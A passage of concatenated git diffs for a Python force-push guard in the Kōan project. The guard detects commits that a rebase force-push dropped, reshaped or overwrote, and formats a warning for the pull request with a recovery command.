     sha = out.split()[0] if out.split() else ""
-    return sha if sha and sha != pushed_head else ""
+    if not sha:
+        return None  # the branch we just pushed is not there — unverifiable
+    return sha if sha != pushed_head else ""
 
 
 def verify_content_preserved(
@@ -406,6 +439,7 @@ def verify_content_preserved(
     push_remote: str = "",
     branch: str = "",
     pushed_head: str = "",
+    observation_failed: bool = False,
 ) -> Optional[PushGuardFindings]:
     """Run the full post-push content-preservation check.
 
@@ -415,6 +449,13 @@ def verify_content_preserved(
     confirmed pushed SHA there is nothing trustworthy to compare against —
     local HEAD may carry commits that never reached the remote — so the guard
     reports itself skipped (None) rather than analyzing the wrong tree.
+
+    *pre_push_remote_heads* must contain only observations of the remote that
+    was actually pushed to; a tip observed on a remote whose push then failed
+    was never overwritten and would be a false clobber report.
+    *observation_failed* says an observation of that remote could not be made,
+    which is surfaced as an unverified check rather than passing silently.
+
     Returns findings (possibly empty — check ran clean), or None when the
     guard itself could not run. Never raises.
     """
@@ -450,6 +491,21 @@ def verify_content_preserved(
             project_path, candidates[:_MAX_ANALYZED], new_files,
             pre_rebase_head, pushed_head,
         )
+        unverified: List[str] = []
+        if observation_failed:
+            unverified.append(
+                "the remote tip before the push — a commit someone else pushed "
+                "mid-rebase would not show up here"
+            )
+        race = _remote_moved_after_push(
+            project_path, push_remote, branch, pushed_head,
+        )
+        if race is None:
+            race = ""
+            unverified.append(
+                "the remote state after the push — a force-push racing in right "
+                "after ours would not show up here"
+            )
         return PushGuardFindings(
             pre_rebase_head=pre_rebase_head,
             pushed_head=pushed_head,
@@ -460,10 +516,9 @@ def verify_content_preserved(
                 project_path, pre_push_remote_heads or [],
                 pre_rebase_head, pushed_head,
             ),
-            remote_head_now=_remote_moved_after_push(
-                project_path, push_remote, branch, pushed_head,
-            ),
+            remote_head_now=race,
             analysis_truncated=truncated,
+            unverified_checks=unverified,
         )
     except _GIT_ERRORS as e:
         print(
@@ -568,6 +623,12 @@ def build_push_warning(
             f"`{findings.remote_head_now[:12]}`) — this rebase may itself have "
             f"been overwritten; reconcile before pushing again."
         )
+    if findings.unverified_checks:
+        lines.append(
+            "Some safety checks could not run — this rewrite is **not** "
+            "confirmed clean; verify manually:"
+        )
+        lines.extend(f"  - {check}" for check in findings.unverified_checks)
     if findings.analysis_truncated:
         lines.append(
             f"Patch analysis was capped: {findings.analysis_truncated} further "

--- a/koan/app/force_push_guard.py
+++ b/koan/app/force_push_guard.py
@@ -1,0 +1,325 @@
+"""
+Kōan -- Force-push content-preservation guard.
+
+A rebase force-push rewrites a PR branch's history. When it goes wrong, it
+silently drops or alters content the PR previously carried — or clobbers
+commits a human pushed while the rebase was running. This guard detects those
+outcomes *after* the pipeline's final push and renders them as one un-missable
+amber/red alert for the PR comment, always naming the pre-rebase head SHA so
+the previous state stays recoverable.
+
+Contract (specs/components/git-github.md): the guard detects and warns, it
+never blocks — every internal failure degrades to "no findings" and must not
+fail the push or the mission. It has no push-time authority by design: the
+race between "someone pushes" and "Kōan force-pushes" cannot be closed
+client-side, only detected, so the final `ls-remote` check runs after the
+push (the "final check" approach agreed on incident review).
+
+Checks performed by :func:`verify_content_preserved`:
+
+1. **Dropped/modified content** — `git cherry <new> <old>` marks each commit
+   of the old PR head that has no patch-id equivalent in the new history
+   (which includes the freshly-fetched base, so changes that landed upstream
+   count as preserved). A marked commit whose files all vanished from the new
+   PR diff is *dropped*; otherwise it is *modified in-flight* (e.g. reshaped
+   by conflict resolution) and listed for human verification.
+2. **Clobbered concurrent pushes** — if the remote tip observed immediately
+   before the force-push (see :func:`observe_remote_head`) differs from the
+   pre-rebase head, someone pushed mid-rebase and the force-push erased their
+   commits; they are listed by SHA and subject.
+3. **Post-push race** — a final `ls-remote` after the push; if the remote no
+   longer points at what Kōan pushed, someone force-pushed right after us and
+   Kōan's own rebase may have been overwritten.
+"""
+
+import contextlib
+import subprocess
+import sys
+from dataclasses import dataclass, field
+from typing import List, Optional, Set
+
+from app.git_utils import run_git_strict
+from app.github_alerts import build_alert
+
+# Cap per-list rendering so a pathological rebase never floods the PR comment.
+_MAX_LISTED = 10
+
+_GIT_ERRORS = (RuntimeError, subprocess.TimeoutExpired, OSError, ValueError)
+
+
+@dataclass
+class PushGuardFindings:
+    """Result of a post-push content-preservation check.
+
+    Empty lists / fields mean the check ran and found nothing wrong.
+    """
+
+    pre_rebase_head: str = ""
+    pushed_head: str = ""
+    dropped_commits: List[str] = field(default_factory=list)
+    modified_commits: List[str] = field(default_factory=list)
+    dropped_files: List[str] = field(default_factory=list)
+    clobbered_commits: List[str] = field(default_factory=list)
+    remote_head_now: str = ""  # set only when the remote moved after our push
+
+    @property
+    def has_findings(self) -> bool:
+        return bool(
+            self.dropped_commits
+            or self.modified_commits
+            or self.dropped_files
+            or self.clobbered_commits
+            or self.remote_head_now
+        )
+
+    @property
+    def is_critical(self) -> bool:
+        """True when content was actually lost (CAUTION tier)."""
+        return bool(
+            self.dropped_commits or self.dropped_files or self.clobbered_commits
+        )
+
+
+def _git(project_path: str, *args: str, timeout: int = 60) -> str:
+    return run_git_strict(*args, cwd=project_path, timeout=timeout)
+
+
+def observe_remote_head(remote: str, branch: str, project_path: str) -> str:
+    """Snapshot the remote branch tip immediately before a force-push.
+
+    Returns the SHA the remote currently serves for *branch* ("" when the
+    observation fails — the guard then simply skips the clobber check).
+    On success the branch is also fetched so the commits are available
+    locally for post-push analysis (at observation time they are still
+    reachable; after the force-push they may not be). The fetch also
+    refreshes ``refs/remotes/<remote>/<branch>``, so a subsequent
+    ``--force-with-lease`` compares against this freshest observation.
+    """
+    try:
+        out = _git(
+            project_path, "ls-remote", remote, f"refs/heads/{branch}", timeout=30,
+        )
+    except _GIT_ERRORS as e:
+        print(f"[force_push_guard] pre-push ls-remote failed: {e}", file=sys.stderr)
+        return ""
+    sha = out.split()[0] if out.split() else ""
+    if sha:
+        with contextlib.suppress(_GIT_ERRORS):
+            _git(
+                project_path, "fetch", remote,
+                f"+refs/heads/{branch}:refs/remotes/{remote}/{branch}",
+            )
+    return sha
+
+
+def _diff_files(project_path: str, head: str, target_ref: str) -> Set[str]:
+    """Files changed by the PR at *head* relative to its base fork point."""
+    base = _git(project_path, "merge-base", head, target_ref, timeout=30)
+    out = _git(project_path, "diff", "--name-only", f"{base}..{head}")
+    return {line for line in out.splitlines() if line.strip()}
+
+
+def _cherry_missing(project_path: str, new_head: str, old_head: str) -> List[str]:
+    """SHAs of *old_head* commits with no patch-id equivalent in *new_head*."""
+    out = _git(project_path, "cherry", new_head, old_head)
+    return [
+        parts[1]
+        for line in out.splitlines()
+        if (parts := line.split()) and parts[0] == "+" and len(parts) > 1
+    ]
+
+
+def _describe(project_path: str, sha: str) -> str:
+    try:
+        return _git(
+            project_path, "log", "-1", "--format=%h %s", sha, timeout=30,
+        ).strip()
+    except _GIT_ERRORS:
+        return sha[:12]
+
+
+def _commit_files(project_path: str, sha: str) -> Set[str]:
+    try:
+        out = _git(
+            project_path, "diff-tree", "--no-commit-id", "--name-only", "-r", sha,
+        )
+        return {line for line in out.splitlines() if line.strip()}
+    except _GIT_ERRORS:
+        return set()
+
+
+def _classify_missing_commits(
+    project_path: str, missing: List[str], new_files: Set[str],
+) -> tuple:
+    """Split patch-missing commits into (dropped, modified, files_they_touched).
+
+    A commit none of whose files still appear in the new PR diff has vanished
+    entirely (*dropped*); one whose files are still part of the diff was
+    reshaped in-flight (*modified*) and needs human verification.
+    """
+    dropped: List[str] = []
+    modified: List[str] = []
+    touched: Set[str] = set()
+    for sha in missing:
+        files = _commit_files(project_path, sha)
+        if not files:
+            continue  # empty commit — rebase legitimately drops these
+        touched |= files
+        if files & new_files:
+            modified.append(_describe(project_path, sha))
+        else:
+            dropped.append(_describe(project_path, sha))
+    return dropped, modified, touched
+
+
+def _clobbered_commits(
+    project_path: str, pre_push_remote_head: str, pre_rebase_head: str,
+    pushed_head: str,
+) -> List[str]:
+    """Commits erased by the force-push that were not part of the rebase input.
+
+    These exist only when someone pushed to the branch between the pipeline's
+    checkout and its force-push: reachable from the remote tip observed just
+    before the push, but from neither the pre-rebase head nor the new history.
+    """
+    if not pre_push_remote_head:
+        return []
+    if pre_push_remote_head in (pre_rebase_head, pushed_head):
+        return []
+    try:
+        out = _git(
+            project_path, "rev-list", "--max-count=25", pre_push_remote_head,
+            f"^{pre_rebase_head}", f"^{pushed_head}",
+        )
+    except _GIT_ERRORS as e:
+        # Objects unavailable locally (observation fetch failed) — still warn
+        # with the tip SHA so the human can recover it from the remote.
+        print(f"[force_push_guard] clobber rev-list failed: {e}", file=sys.stderr)
+        return [f"{pre_push_remote_head[:12]} (tip of the overwritten push)"]
+    return [_describe(project_path, sha) for sha in out.splitlines() if sha.strip()]
+
+
+def _remote_moved_after_push(
+    project_path: str, push_remote: str, branch: str, pushed_head: str,
+) -> str:
+    """Final post-push check: does the remote still point at what we pushed?"""
+    if not push_remote or not branch:
+        return ""
+    try:
+        out = _git(
+            project_path, "ls-remote", push_remote, f"refs/heads/{branch}",
+            timeout=30,
+        )
+    except _GIT_ERRORS as e:
+        print(f"[force_push_guard] post-push ls-remote failed: {e}", file=sys.stderr)
+        return ""
+    sha = out.split()[0] if out.split() else ""
+    return sha if sha and sha != pushed_head else ""
+
+
+def verify_content_preserved(
+    pre_rebase_head: str,
+    target_ref: str,
+    project_path: str,
+    *,
+    pre_push_remote_head: str = "",
+    push_remote: str = "",
+    branch: str = "",
+) -> Optional[PushGuardFindings]:
+    """Run the full post-push content-preservation check.
+
+    Must run while the rebased PR branch is still checked out (HEAD is taken
+    as the pushed state, so it also covers follow-up pushes such as private
+    review-gate fixes). Returns findings (possibly empty — check ran clean),
+    or None when the guard itself could not run. Never raises.
+    """
+    try:
+        pushed_head = _git(project_path, "rev-parse", "HEAD", timeout=30)
+        old_files = _diff_files(project_path, pre_rebase_head, target_ref)
+        new_files = _diff_files(project_path, pushed_head, target_ref)
+        missing = _cherry_missing(project_path, pushed_head, pre_rebase_head)
+        dropped, modified, touched = _classify_missing_commits(
+            project_path, missing, new_files,
+        )
+        return PushGuardFindings(
+            pre_rebase_head=pre_rebase_head,
+            pushed_head=pushed_head,
+            dropped_commits=dropped,
+            modified_commits=modified,
+            dropped_files=sorted((old_files - new_files) & touched),
+            clobbered_commits=_clobbered_commits(
+                project_path, pre_push_remote_head, pre_rebase_head, pushed_head,
+            ),
+            remote_head_now=_remote_moved_after_push(
+                project_path, push_remote, branch, pushed_head,
+            ),
+        )
+    except _GIT_ERRORS as e:
+        print(
+            f"[force_push_guard] content check could not run: {e}",
+            file=sys.stderr,
+        )
+        return None
+
+
+def _listed(items: List[str]) -> List[str]:
+    """Render '<sha> <subject>' entries as indented bullets, capped."""
+    shown = []
+    for item in items[:_MAX_LISTED]:
+        sha, _, subject = item.partition(" ")
+        shown.append(f"  - `{sha}` {subject}".rstrip())
+    if len(items) > _MAX_LISTED:
+        shown.append(f"  - … and {len(items) - _MAX_LISTED} more")
+    return shown
+
+
+def build_push_warning(
+    findings: Optional[PushGuardFindings],
+    branch: str,
+    provider: str = "github",
+) -> str:
+    """Render findings as ONE alert block ("" when there is nothing to say).
+
+    CAUTION when content was lost (dropped commits/files, clobbered pushes),
+    WARNING when it only changed shape or the remote raced us. Exactly one
+    alert regardless of how many findings — per the parsimony rule in
+    specs/components/comment-formatting.md.
+    """
+    if findings is None or not findings.has_findings:
+        return ""
+    lines: List[str] = [
+        f"**Force-push safety check — the rewrite of `{branch}` needs attention.**",
+        "",
+    ]
+    if findings.dropped_commits:
+        lines.append("Commits whose changes are GONE from this PR after the rebase:")
+        lines.extend(_listed(findings.dropped_commits))
+    if findings.dropped_files:
+        files = ", ".join(f"`{f}`" for f in findings.dropped_files[:_MAX_LISTED])
+        lines.append(f"Files whose PR changes disappeared: {files}")
+    if findings.clobbered_commits:
+        lines.append(
+            "Commits pushed by someone else DURING the rebase were overwritten:"
+        )
+        lines.extend(_listed(findings.clobbered_commits))
+    if findings.modified_commits:
+        lines.append(
+            "Commits reshaped in-flight (e.g. by conflict resolution) — "
+            "verify their changes survived:"
+        )
+        lines.extend(_listed(findings.modified_commits))
+    if findings.remote_head_now:
+        lines.append(
+            f"The branch moved again right after the push (remote now at "
+            f"`{findings.remote_head_now[:12]}`) — this rebase may itself have "
+            f"been overwritten; reconcile before pushing again."
+        )
+    lines.append("")
+    lines.append(
+        f"Previous PR head: `{findings.pre_rebase_head}` — everything it "
+        f"contained is recoverable: "
+        f"`git fetch origin {findings.pre_rebase_head[:12]} && "
+        f"git switch -c {branch}-backup FETCH_HEAD`"
+    )
+    kind = "CAUTION" if findings.is_critical else "WARNING"
+    return build_alert(kind, "\n".join(lines), provider=provider)

--- a/koan/app/force_push_guard.py
+++ b/koan/app/force_push_guard.py
@@ -222,13 +222,20 @@ def _added_lines(project_path: str, sha: str, *, merge: bool = False) -> Set[str
         columns = 1
         out = _git(project_path, "show", "--format=", "--unified=0", sha)
     marker = "+" * columns
-    return {
-        line[columns:].strip()
-        for line in out.splitlines()
-        if line.startswith(marker)
-        and not line.startswith("+++")
-        and line[columns:].strip()
-    }
+    added: Set[str] = set()
+    previous = ""
+    for line in out.splitlines():
+        # The "--- a/x" / "+++ b/x" header pair keeps three markers whatever the
+        # column count, so it is matched as a pair rather than by prefix length
+        # (an octopus merge's own content lines start with "+++" too).
+        is_header = line.startswith("+++ ") and previous.startswith("--- ")
+        previous = line
+        if is_header or not line.startswith(marker):
+            continue
+        content = line[columns:].strip()
+        if content:
+            added.add(content)
+    return added
 
 
 def _content_preserved(

--- a/koan/app/force_push_guard.py
+++ b/koan/app/force_push_guard.py
@@ -18,18 +18,26 @@ push (the "final check" approach agreed on incident review).
 Checks performed by :func:`verify_content_preserved`:
 
 1. **Dropped/modified content** — `git cherry <new> <old>` marks each commit
-   of the old PR head that has no patch-id equivalent in the new history
-   (which includes the freshly-fetched base, so changes that landed upstream
-   count as preserved). A marked commit whose files all vanished from the new
-   PR diff is *dropped*; otherwise it is *modified in-flight* (e.g. reshaped
-   by conflict resolution) and listed for human verification.
-2. **Clobbered concurrent pushes** — if the remote tip observed immediately
-   before the force-push (see :func:`observe_remote_head`) differs from the
-   pre-rebase head, someone pushed mid-rebase and the force-push erased their
-   commits; they are listed by SHA and subject.
+   of the old PR head that has no patch-id equivalent in the new history.
+   Patch-id equivalence alone is too strict (an upstream squash-merge or mere
+   context-line drift breaks it on perfectly clean rebases), so a marked
+   commit is only reported when content-level cross-checks also fail: its
+   files' bytes differ between the old and the pushed head, AND at least one
+   line it added is no longer present verbatim at the pushed head. A surviving
+   report is *dropped* when the commit's files vanished from the new PR diff
+   entirely, otherwise *modified in-flight* (e.g. reshaped by conflict
+   resolution) and listed for human verification.
+2. **Clobbered concurrent pushes** — the remote tip is observed immediately
+   before every force-push of the pipeline (step-6 push and any private-gate
+   re-push; see :func:`observe_remote_head`). If an observed tip is neither
+   the pre-rebase head nor part of the pushed history, someone pushed
+   mid-pipeline and the force-push erased their commits; they are listed by
+   SHA and subject.
 3. **Post-push race** — a final `ls-remote` after the push; if the remote no
-   longer points at what Kōan pushed, someone force-pushed right after us and
-   Kōan's own rebase may have been overwritten.
+   longer points at the last SHA Kōan actually pushed, someone force-pushed
+   right after us and Kōan's own rebase may have been overwritten. The
+   comparison uses the recorded pushed SHA, not local HEAD, so a local commit
+   that failed to push is never misreported as a race.
 """
 
 import contextlib
@@ -43,6 +51,9 @@ from app.github_alerts import build_alert
 
 # Cap per-list rendering so a pathological rebase never floods the PR comment.
 _MAX_LISTED = 10
+# Cap per-commit analysis so a rewritten base history (hundreds of patch-id
+# misses) cannot stall the pipeline with two subprocesses per commit.
+_MAX_ANALYZED = 200
 
 _GIT_ERRORS = (RuntimeError, subprocess.TimeoutExpired, OSError, ValueError)
 
@@ -61,6 +72,7 @@ class PushGuardFindings:
     dropped_files: List[str] = field(default_factory=list)
     clobbered_commits: List[str] = field(default_factory=list)
     remote_head_now: str = ""  # set only when the remote moved after our push
+    analysis_truncated: int = 0  # patch-id misses beyond the analysis cap
 
     @property
     def has_findings(self) -> bool:
@@ -70,6 +82,7 @@ class PushGuardFindings:
             or self.dropped_files
             or self.clobbered_commits
             or self.remote_head_now
+            or self.analysis_truncated
         )
 
     @property
@@ -148,14 +161,70 @@ def _commit_files(project_path: str, sha: str) -> Set[str]:
         return set()
 
 
-def _classify_missing_commits(
-    project_path: str, missing: List[str], new_files: Set[str],
-) -> tuple:
-    """Split patch-missing commits into (dropped, modified, files_they_touched).
+def _content_unchanged_at_head(
+    project_path: str, files: Set[str], old_head: str, new_head: str,
+) -> bool:
+    """True when every file in *files* is byte-identical at both heads.
 
-    A commit none of whose files still appear in the new PR diff has vanished
-    entirely (*dropped*); one whose files are still part of the diff was
-    reshaped in-flight (*modified*) and needs human verification.
+    This is what makes an upstream squash-merge count as preserved: the
+    commit's patch-id has no equivalent anywhere, yet the pushed head carries
+    exactly the content the old PR head carried.
+    """
+    out = _git(
+        project_path, "diff", "--name-only", old_head, new_head,
+        "--", *sorted(files),
+    )
+    return not out.strip()
+
+
+def _added_lines(project_path: str, sha: str) -> Set[str]:
+    """The non-blank lines a commit added, whitespace-normalized."""
+    out = _git(project_path, "show", "--format=", "--unified=0", sha)
+    return {
+        line[1:].strip()
+        for line in out.splitlines()
+        if line.startswith("+") and not line.startswith("+++") and line[1:].strip()
+    }
+
+
+def _added_lines_survive(
+    project_path: str, sha: str, files: Set[str], pushed_head: str,
+) -> bool:
+    """True when every line the commit added still exists at the pushed head.
+
+    This is what keeps routine context-line drift (upstream edits near a PR
+    hunk shift the patch-id) from producing warnings on clean rebases. A
+    commit with no added lines (deletion-only, binary, mode change) cannot be
+    verified this way and stays flagged — conservative by design.
+    """
+    try:
+        added = _added_lines(project_path, sha)
+    except _GIT_ERRORS:
+        return False
+    if not added:
+        return False
+    head_lines: Set[str] = set()
+    for f in sorted(files):
+        with contextlib.suppress(_GIT_ERRORS):
+            blob = _git(project_path, "show", f"{pushed_head}:{f}")
+            head_lines |= {line.strip() for line in blob.splitlines()}
+    return added <= head_lines
+
+
+def _classify_missing_commits(
+    project_path: str,
+    missing: List[str],
+    new_files: Set[str],
+    pre_rebase_head: str,
+    pushed_head: str,
+) -> tuple:
+    """Split patch-id-missing commits into (dropped, modified, files_touched).
+
+    A missing patch-id alone is not loss — the commit is cleared when its
+    files are byte-identical across both heads (upstream squash-merge) or when
+    every line it added still exists at the pushed head (context drift). What
+    survives those checks is *dropped* when none of its files remain in the
+    new PR diff, otherwise *modified in-flight*.
     """
     dropped: List[str] = []
     modified: List[str] = []
@@ -164,6 +233,13 @@ def _classify_missing_commits(
         files = _commit_files(project_path, sha)
         if not files:
             continue  # empty commit — rebase legitimately drops these
+        with contextlib.suppress(_GIT_ERRORS):
+            if _content_unchanged_at_head(
+                project_path, files, pre_rebase_head, pushed_head,
+            ):
+                continue  # content preserved verbatim (e.g. upstream squash)
+        if _added_lines_survive(project_path, sha, files, pushed_head):
+            continue  # patch-id drift only — every added line survived
         touched |= files
         if files & new_files:
             modified.append(_describe(project_path, sha))
@@ -173,30 +249,48 @@ def _classify_missing_commits(
 
 
 def _clobbered_commits(
-    project_path: str, pre_push_remote_head: str, pre_rebase_head: str,
+    project_path: str, observed_heads: List[str], pre_rebase_head: str,
     pushed_head: str,
 ) -> List[str]:
-    """Commits erased by the force-push that were not part of the rebase input.
+    """Commits erased by a force-push that were not part of the rebase input.
 
-    These exist only when someone pushed to the branch between the pipeline's
-    checkout and its force-push: reachable from the remote tip observed just
-    before the push, but from neither the pre-rebase head nor the new history.
+    *observed_heads* are the remote tips seen immediately before each push of
+    the pipeline (step-6 push and any private-gate re-push). A tip that is
+    neither the pre-rebase head nor something we pushed means someone pushed
+    mid-pipeline; its commits outside both histories were overwritten.
     """
-    if not pre_push_remote_head:
-        return []
-    if pre_push_remote_head in (pre_rebase_head, pushed_head):
-        return []
-    try:
-        out = _git(
-            project_path, "rev-list", "--max-count=25", pre_push_remote_head,
-            f"^{pre_rebase_head}", f"^{pushed_head}",
-        )
-    except _GIT_ERRORS as e:
-        # Objects unavailable locally (observation fetch failed) — still warn
-        # with the tip SHA so the human can recover it from the remote.
-        print(f"[force_push_guard] clobber rev-list failed: {e}", file=sys.stderr)
-        return [f"{pre_push_remote_head[:12]} (tip of the overwritten push)"]
-    return [_describe(project_path, sha) for sha in out.splitlines() if sha.strip()]
+    clobbered: List[str] = []
+    seen: Set[str] = set()
+    for observed in observed_heads:
+        if not observed or observed in (pre_rebase_head, pushed_head):
+            continue
+        try:
+            if _git(
+                project_path, "merge-base", "--is-ancestor", observed, pushed_head,
+                timeout=30,
+            ) == "":
+                continue  # observed tip is part of the pushed history
+        except _GIT_ERRORS:
+            pass  # not an ancestor (exit 1) or objects unknown — inspect below
+        try:
+            out = _git(
+                project_path, "rev-list", "--max-count=25", observed,
+                f"^{pre_rebase_head}", f"^{pushed_head}",
+            )
+            shas = [s for s in out.splitlines() if s.strip()]
+        except _GIT_ERRORS as e:
+            # Objects unavailable locally (observation fetch failed) — still
+            # warn with the tip SHA so the human can recover it remotely.
+            print(f"[force_push_guard] clobber rev-list failed: {e}", file=sys.stderr)
+            shas = []
+            if observed not in seen:
+                seen.add(observed)
+                clobbered.append(f"{observed[:12]} (tip of the overwritten push)")
+        for sha in shas:
+            if sha not in seen:
+                seen.add(sha)
+                clobbered.append(_describe(project_path, sha))
+    return clobbered
 
 
 def _remote_moved_after_push(
@@ -222,24 +316,36 @@ def verify_content_preserved(
     target_ref: str,
     project_path: str,
     *,
-    pre_push_remote_head: str = "",
+    pre_push_remote_heads: Optional[List[str]] = None,
     push_remote: str = "",
     branch: str = "",
+    pushed_head: str = "",
 ) -> Optional[PushGuardFindings]:
     """Run the full post-push content-preservation check.
 
-    Must run while the rebased PR branch is still checked out (HEAD is taken
-    as the pushed state, so it also covers follow-up pushes such as private
-    review-gate fixes). Returns findings (possibly empty — check ran clean),
-    or None when the guard itself could not run. Never raises.
+    *pushed_head* is the SHA the pipeline last successfully pushed; it is the
+    reference for every comparison (a local commit that failed to push must
+    not skew the analysis or fake a race). When empty, falls back to HEAD —
+    the PR branch must then still be checked out. Returns findings (possibly
+    empty — check ran clean), or None when the guard itself could not run.
+    Never raises.
     """
     try:
-        pushed_head = _git(project_path, "rev-parse", "HEAD", timeout=30)
+        if not pushed_head:
+            pushed_head = _git(project_path, "rev-parse", "HEAD", timeout=30)
         old_files = _diff_files(project_path, pre_rebase_head, target_ref)
         new_files = _diff_files(project_path, pushed_head, target_ref)
         missing = _cherry_missing(project_path, pushed_head, pre_rebase_head)
+        truncated = max(0, len(missing) - _MAX_ANALYZED)
+        if truncated:
+            print(
+                f"[force_push_guard] analysis capped: {len(missing)} patch-id "
+                f"misses, analyzing first {_MAX_ANALYZED}",
+                file=sys.stderr,
+            )
         dropped, modified, touched = _classify_missing_commits(
-            project_path, missing, new_files,
+            project_path, missing[:_MAX_ANALYZED], new_files,
+            pre_rebase_head, pushed_head,
         )
         return PushGuardFindings(
             pre_rebase_head=pre_rebase_head,
@@ -248,11 +354,13 @@ def verify_content_preserved(
             modified_commits=modified,
             dropped_files=sorted((old_files - new_files) & touched),
             clobbered_commits=_clobbered_commits(
-                project_path, pre_push_remote_head, pre_rebase_head, pushed_head,
+                project_path, pre_push_remote_heads or [],
+                pre_rebase_head, pushed_head,
             ),
             remote_head_now=_remote_moved_after_push(
                 project_path, push_remote, branch, pushed_head,
             ),
+            analysis_truncated=truncated,
         )
     except _GIT_ERRORS as e:
         print(
@@ -263,27 +371,43 @@ def verify_content_preserved(
 
 
 def _listed(items: List[str]) -> List[str]:
-    """Render '<sha> <subject>' entries as indented bullets, capped."""
+    """Render '<sha> <subject>' entries as indented bullets, capped.
+
+    Subjects are attacker-influenced (anyone who can commit controls them), so
+    they are rendered inside code spans — GitHub does not linkify, mention, or
+    interpret markdown there. Embedded backticks are squashed so a subject
+    cannot break out of its span.
+    """
     shown = []
     for item in items[:_MAX_LISTED]:
         sha, _, subject = item.partition(" ")
-        shown.append(f"  - `{sha}` {subject}".rstrip())
+        subject = subject.replace("`", "'").strip()
+        shown.append(f"  - `{sha}` `{subject}`" if subject else f"  - `{sha}`")
     if len(items) > _MAX_LISTED:
         shown.append(f"  - … and {len(items) - _MAX_LISTED} more")
     return shown
+
+
+def _listed_files(files: List[str]) -> str:
+    rendered = ", ".join(f"`{f}`" for f in files[:_MAX_LISTED])
+    if len(files) > _MAX_LISTED:
+        rendered += f", … and {len(files) - _MAX_LISTED} more"
+    return rendered
 
 
 def build_push_warning(
     findings: Optional[PushGuardFindings],
     branch: str,
     provider: str = "github",
+    remote: str = "origin",
 ) -> str:
     """Render findings as ONE alert block ("" when there is nothing to say).
 
     CAUTION when content was lost (dropped commits/files, clobbered pushes),
     WARNING when it only changed shape or the remote raced us. Exactly one
     alert regardless of how many findings — per the parsimony rule in
-    specs/components/comment-formatting.md.
+    specs/components/comment-formatting.md. *remote* is the remote the push
+    actually targeted, used in the recovery command.
     """
     if findings is None or not findings.has_findings:
         return ""
@@ -295,8 +419,10 @@ def build_push_warning(
         lines.append("Commits whose changes are GONE from this PR after the rebase:")
         lines.extend(_listed(findings.dropped_commits))
     if findings.dropped_files:
-        files = ", ".join(f"`{f}`" for f in findings.dropped_files[:_MAX_LISTED])
-        lines.append(f"Files whose PR changes disappeared: {files}")
+        lines.append(
+            "Files whose PR changes disappeared: "
+            + _listed_files(findings.dropped_files)
+        )
     if findings.clobbered_commits:
         lines.append(
             "Commits pushed by someone else DURING the rebase were overwritten:"
@@ -304,8 +430,8 @@ def build_push_warning(
         lines.extend(_listed(findings.clobbered_commits))
     if findings.modified_commits:
         lines.append(
-            "Commits reshaped in-flight (e.g. by conflict resolution) — "
-            "verify their changes survived:"
+            "Commits whose patch changed in-flight and whose content could not "
+            "be verified as preserved — check these survived:"
         )
         lines.extend(_listed(findings.modified_commits))
     if findings.remote_head_now:
@@ -314,11 +440,17 @@ def build_push_warning(
             f"`{findings.remote_head_now[:12]}`) — this rebase may itself have "
             f"been overwritten; reconcile before pushing again."
         )
+    if findings.analysis_truncated:
+        lines.append(
+            f"Patch analysis was capped: {findings.analysis_truncated} further "
+            f"rewritten commits were not analyzed (a base-history rewrite is "
+            f"likely) — review the branch history manually."
+        )
     lines.append("")
     lines.append(
         f"Previous PR head: `{findings.pre_rebase_head}` — everything it "
         f"contained is recoverable: "
-        f"`git fetch origin {findings.pre_rebase_head[:12]} && "
+        f"`git fetch {remote} {findings.pre_rebase_head} && "
         f"git switch -c {branch}-backup FETCH_HEAD`"
     )
     kind = "CAUTION" if findings.is_critical else "WARNING"

--- a/koan/app/rebase_pr.py
+++ b/koan/app/rebase_pr.py
@@ -1072,6 +1072,7 @@ def _run_rebase_impl(
         "remote": push_result.get("remote", ""),
         "pushed_head": push_result.get("pushed_head", ""),
         "observations": [h for h in push_result.get("pre_push_remote_heads", []) if h],
+        "observation_failed": bool(push_result.get("observation_failed")),
     }
 
     # ── Step 7: Private review gate ────────────────────────────────────
@@ -1204,8 +1205,14 @@ def _run_rebase_private_review_gate(
         # Feed the guard: this push's fresh observation and pushed SHA, so a
         # human push landing between the main push and this one is detected.
         if push_state is not None:
-            if push_result.get("remote"):
-                push_state["remote"] = push_result["remote"]
+            gate_remote = push_result.get("remote", "")
+            # Observations only mean something for the remote they were taken
+            # on: if the gate landed somewhere else, the earlier ones describe
+            # a branch this pipeline never overwrote.
+            if gate_remote and gate_remote != push_state.get("remote"):
+                push_state["remote"] = gate_remote
+                push_state["observations"] = []
+                push_state["observation_failed"] = False
             # Always overwrite, including with "": once the gate has pushed,
             # the step-6 SHA is stale and comparing against it would fake a
             # race. No confirmed SHA means the guard skips, which is correct.
@@ -1214,6 +1221,8 @@ def _run_rebase_private_review_gate(
             for observed in push_result.get("pre_push_remote_heads", []):
                 if observed and observed not in observations:
                     observations.append(observed)
+            if push_result.get("observation_failed"):
+                push_state["observation_failed"] = True
 
     try:
         from app.private_review_gate import run_private_review_gate
@@ -2333,37 +2342,37 @@ def _run_force_push_guard(
 
     *push_state* carries the accumulated push telemetry: the remote actually
     pushed to, the last successfully pushed SHA, and every pre-push remote
-    observation (main push + gate re-pushes). Best-effort by contract
-    (specs/components/git-github.md): a guard that cannot run logs the fact
-    and returns "" — it never fails the rebase.
+    observation of that remote (main push + gate re-pushes). Best-effort by
+    contract (specs/components/git-github.md): a guard that cannot run logs
+    the fact and returns "" — it never fails the rebase.
+
+    The branch is already force-pushed by the time this runs, so the whole
+    body is inside the best-effort boundary: an unexpected failure here must
+    not turn a completed rebase into a failed mission, nor skip the PR comment
+    and CI enqueue that follow.
     """
     if not pre_rebase_head:
         actions_log.append(
             "Force-push guard skipped: pre-rebase head was not captured"
         )
         return ""
-    findings = force_push_guard.verify_content_preserved(
-        pre_rebase_head,
-        target_ref,
-        project_path,
-        pre_push_remote_heads=push_state.get("observations", []),
-        push_remote=push_state.get("remote", ""),
-        branch=branch,
-        pushed_head=push_state.get("pushed_head", ""),
-    )
-    if findings is None:
+    try:
+        section = _build_push_guard_section(
+            pre_rebase_head=pre_rebase_head,
+            target_ref=target_ref,
+            project_path=project_path,
+            push_state=push_state,
+            branch=branch,
+            actions_log=actions_log,
+        )
+    except Exception as e:
+        print(f"[rebase_pr] force-push guard failed: {e}", file=sys.stderr)
         actions_log.append(
-            "Force-push guard skipped: no confirmed pushed SHA, or the content "
-            "check could not run (non-fatal)"
+            f"Force-push guard skipped: unexpected guard failure ({e}) — "
+            f"the rebase itself is unaffected"
         )
         return ""
-    section = force_push_guard.build_push_warning(
-        findings, branch, remote=push_state.get("remote") or "origin",
-    )
     if not section:
-        actions_log.append(
-            "Force-push guard: all original PR content verified preserved"
